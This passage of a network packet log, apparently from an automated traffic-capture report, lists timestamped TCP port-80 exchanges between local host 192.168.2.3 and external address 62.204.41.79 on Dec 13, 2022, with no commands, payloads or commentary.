                                              Dec 13, 2022 20:09:18.190378904 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.190541029 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.190572023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.190651894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.190793991 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.190853119 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.191257954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.191279888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.191296101 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.191309929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.191658974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.191674948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.191689014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.191720963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.191855907 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.191907883 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.192014933 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.192136049 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.192213058 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.192590952 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.192610979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.201322079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.201663971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.201801062 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.201934099 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.202028036 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.202150106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.202270985 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.202387094 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.202507019 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.202630043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.202747107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.202864885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.202984095 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.203102112 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.203218937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.203336000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.203583956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.203583956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.203702927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.203819990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.203937054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.204058886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.204174995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.204297066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.204406977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.204524040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.204641104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.204760075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.204879045 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.204992056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.205115080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.205235004 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.205367088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.205476999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.205600977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.205749035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.205852985 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.205970049 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.206084967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.206197977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.206311941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.206433058 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.206549883 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.206665039 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.206779957 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.206927061 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.207037926 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.207227945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.207351923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.207467079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.207683086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.207700968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.207818985 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.212275028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.212389946 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.212487936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.212594986 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.213011026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.213011026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.213011026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.213011026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.213037968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.213232994 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.213232994 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.213356018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.213455915 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.213547945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.213649035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.213738918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.213896990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.213990927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.214088917 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.214181900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.214279890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.214369059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.214466095 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.214557886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.214656115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.214746952 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.214843988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.214942932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.215048075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.215138912 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.215244055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.215346098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.215457916 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.215533972 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.215632915 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.215722084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.215818882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.215909958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.216008902 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.216098070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.216192961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.216284037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.216379881 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.216471910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.216567039 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.216660023 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.216757059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.216847897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.216943979 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.217035055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.217130899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.217221975 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.217318058 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.220249891 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.220357895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.220459938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.220560074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.220658064 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.220750093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.220859051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.223781109 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.223803997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.223817110 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.223912954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.224070072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.224270105 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.224308014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.224523067 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.224536896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.224630117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.224912882 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.225043058 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.225152969 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.225204945 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.225218058 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.225286007 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.225431919 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.225502968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.225581884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.225714922 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.225914001 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.226032019 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.226118088 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.226453066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.226470947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.226490021 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.226507902 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.226552963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.226670980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.226753950 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.226844072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.226912975 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.227194071 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.227272987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.227435112 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.227732897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.227801085 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.228741884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.228763103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.228781939 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.228800058 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.228820086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.228836060 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.228959084 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.229156017 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.229259014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.229276896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.230788946 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.230926991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.231023073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.231131077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.231228113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.231319904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.231405020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.231493950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.231580973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.231667995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.231766939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.231863976 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.231952906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.232038975 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.232125044 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.232212067 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.232300997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.232387066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.232476950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.232567072 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.232654095 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.232741117 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.232837915 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.232928038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.233017921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.233113050 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.233207941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.233299971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.233407021 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.233505964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.233601093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.233695030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.233793020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.233897924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.233995914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.234086990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.234173059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.234267950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.234365940 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.234468937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.234559059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.234662056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.234751940 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.234843969 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.234930038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.235016108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.235573053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.235640049 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.235847950 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.235872030 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.236130953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.236155987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.236320972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.236354113 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.236428022 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.236531973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.236645937 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.237803936 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.237831116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.237854004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.238020897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.238044024 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.238065004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.238085985 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.238163948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.244570017 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.244599104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.244818926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.244920015 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.244997978 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.245201111 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.245451927 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.245470047 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.245554924 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.245682001 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.245773077 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.245922089 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.245944977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.246211052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.246229887 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.246277094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.246313095 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.246536016 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.246543884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.246685982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.246802092 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.246887922 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.246989965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.247081041 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.247328043 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.254224062 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.254297972 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.254399061 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.254491091 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.254590988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.254678965 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.254796028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.254873037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.254975080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.255059958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.255146980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.255234003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.255330086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.255418062 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.255503893 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.255592108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.255677938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.255764961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.255851030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.255939007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.256026030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.256112099 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.256198883 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.256287098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.256373882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.256459951 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.256548882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.256634951 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.256721973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.256808996 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.256906986 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.256984949 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.257071972 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.257164001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.257458925 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.257565975 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.257661104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.257746935 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.257837057 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.257922888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.258012056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.258099079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.258186102 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.258272886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.258361101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.258447886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.258534908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.258622885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.258713007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.258812904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.258910894 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.259007931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.262262106 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.262281895 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.262546062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.262610912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.263191938 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.263211966 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.263329983 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.264209986 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.264225006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.264256001 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.264364958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.264489889 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.264691114 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.264889002 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.264934063 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.265011072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.265292883 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.265326977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.265459061 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.265780926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.265896082 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.266213894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.266242981 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.266585112 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.266602039 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.266925097 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.266942024 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.266962051 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.267035961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.267092943 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.267339945 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.267537117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.267568111 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.268044949 CET804973662.204.41.79192.168.2.3
